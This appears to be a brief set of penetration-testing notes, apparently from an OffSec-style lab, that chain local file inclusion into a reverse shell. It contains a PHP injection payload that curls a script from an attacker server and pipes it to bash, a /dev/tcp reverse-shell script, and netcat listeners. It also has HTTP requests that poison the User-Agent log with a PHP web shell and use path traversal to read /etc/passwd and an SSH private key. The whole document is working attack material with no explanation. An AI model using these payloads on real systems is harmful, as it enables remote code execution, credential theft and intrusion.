# LFI to Revers shell:

http://192.192.1.1/index.php?page=' and die(system("curl http://attacker_ip_simple_http_server/revreshell.sh | bash")) or '

cat revreshell.sh
#!/bin/bash
bash -i >& /dev/tcp/attacker_ip_local_ip/1234 0>&1

nc -lvnp 1234
-------------------------------------------------------


GET /meteor/index.php?page=admin.php HTTP/1.1
Host: mountaindesserts.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 <?php echo system($_GET['cmd']); ?>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1


GET /meteor/index.php?page=cat${IFS}/etc/passwd&cmd=bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.119.3%2F4444%200%3E%261%22 HTTP/1.1


GET /meteor/index.php?page=../../../../home/offsec/.ssh/id_rsa&cmd=bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.119.3%2F4444%200%3E%261%22 HTTP/1.1
Host: mountaindesserts.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 <?php echo system($_GET['cmd']); ?>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1


nc -nvlp 4444
